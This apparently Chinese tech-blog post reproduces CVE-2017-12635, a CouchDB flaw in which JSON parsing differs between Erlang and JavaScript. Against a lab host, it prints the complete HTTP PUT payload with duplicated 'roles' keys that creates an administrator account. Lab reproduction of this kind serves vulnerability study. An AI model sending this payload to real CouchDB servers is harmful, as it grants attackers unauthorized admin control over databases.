温馨提示×

温馨提示×

您好,登录后才能下订单哦!

密码登录×
登录注册×
其他方式登录
点击 登录注册 即表示同意《亿速云用户服务条款》

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

发布时间:2021-12-29 17:42:13 来源:亿速云 阅读:136 作者:柒染 栏目:安全技术

这篇文章将为大家详细讲解有关couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。

CouchDB 是一个开源的面向文档的数据库管理系统,可以通过 RESTful JavaScript Object Notation (JSON) API 访问。术语 “Couch” 是 “Cluster Of Unreliable Commodity Hardware” 的首字母缩写,它反映了 CouchDB 的目标具有高度可伸缩性,提供了高可用性和高可靠性,即使运行在容易出现故障的硬件上也是如此。

CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

下面仅作漏洞复现记录与实现,利用流程如下:

一、漏洞环境

目标链接:http://192.168.101.152:5984/

直接访问是这样子的

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

访问http://192.168.101.152:5984/_utils/后如下

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

直接点击_users会提示无权访问数据库

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

二、利用流程

首先发送第一个数据包,会提示403错误,提示只有管理员可以设置角色

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

但发送包含两个roles的数据包,即可绕过限制,创建一个管理员账户,这里创建了一个账户密码皆为vulhub的管理员账户

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.101.152:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"password": "vulhub"
}

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

再回到前台登录,已经可以访问了

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的

关于couchdb垂直越权漏洞CVE-2017-12635复现是怎么进行的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。

向AI问一下细节

免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。

AI